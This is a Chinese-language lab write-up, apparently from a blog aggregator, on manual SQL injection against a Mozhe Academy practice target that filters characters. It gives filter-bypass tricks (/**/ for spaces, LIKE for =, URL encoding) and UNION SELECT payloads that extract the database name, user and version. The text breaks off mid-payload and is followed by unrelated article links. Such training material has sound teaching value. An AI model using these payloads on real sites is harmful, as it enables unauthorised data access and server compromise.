当前位置: 首页 > news >正文

墨者学院SQL过滤字符后手工注入漏洞测试(第1题)

注意:以下的所有语句都需要手动url编码后才可绕过检测从而执行

可以用like代替=

可以用/**/代替空格

一:判断是否存在注入

?id=1',页面变成白板,初步判定存在注入点

二:猜测具体数据

1:猜测列的数量

原语句?id=1/**/order/**/by/**/1

一直加到5页面不显示,说明列的数量是4个

2:查看可回显的列的位置

?id=-1/**/union/**/select/**/1,2,3,4

可回显的列为2和3 

3:信息收集

数据库名:mozhe_discuz_stormgroup

用户权限:root@localhost(可执行增删查改,rce,写shell操作)

版本号:5.5.61-0ubuntu0.14.04.1

?id=-1/**/union/**/select/**/1,version(),database(),4

?id=-1/**/union/**/select/**/1,user(),databa

http://www.dtcms.com/a/313784.html

相关文章:

  • uniapp快遞上門提貨的時間選擇的插件
  • Perl 面向对象编程深入解析
  • 【Git】常见命令整理
  • 工作流绑定卡片优化用户体验-练习我要找工作智能体
  • 人类学家与建筑师:解析 UX 研究与项目管理的需求分析差异​
  • 豆包新模型+PromptPilot深度评测:提示词工程的智能化突破
  • 数据结构:合并两个单链表(merging two linked lists)
  • 下面是修正后的完整版 doit_effects.c,已经做了三大关键修复(文件开头也有注释说明)
  • 使用opencv基于realsense D435i展示基本的图像
  • 如何基于MQ实现分布式事务
  • 深入浅出 RabbitMQ:简单队列实战指南
  • 消防器材检测数据集介绍-9,600 张图片 智慧安防系统 建筑施工安全监管 AI 消防巡检机器人 自动审核系统 公共场所安全监测
  • 深入解析线程同步中WaitForSingleObject的超时问题
  • Flutter 事件总线 Event Bus
  • 【2025WACV-最佳论文】RayGauss:基于体积高斯的光线投射,用于逼真的小说视图合成
  • 【机器学习】(算法优化二)提升算法之:AdaBoost与随机梯度
  • Java 中 BigDecimal、Float、Double 的取整与保留小数处理方法详解
  • 从 0 到 1 开发图书管理系统:飞算 JavaAI 让技术落地更简单
  • 13.Home-面板组件封装
  • 如何设计和实施高效的向量化数据检索解决方案
  • 阿里云-通义灵码:解锁云原生智能开发新能力,让云开发更“灵”~
  • Clion STM32CubeMX LED闪灯
  • 为什么叫电磁兼容?
  • 【Java】一篇详解HashMap的扩容机制!!
  • SCI论文选词炼句(下)
  • vue3指定设置了dom元素的ref但是为null问题
  • Druid手写核心实现案例 实现一个简单Select 解析,包含Lexer、Parser、AstNode
  • 第三章 浏览器 【5. 事件】
  • Java项目:基于SSM框架实现的电子病历管理系统【ssm+B/S架构+源码+数据库+毕业论文+远程部署】
  • 前端开发(HTML,CSS,VUE,JS)从入门到精通!第五天(jQuery函数库)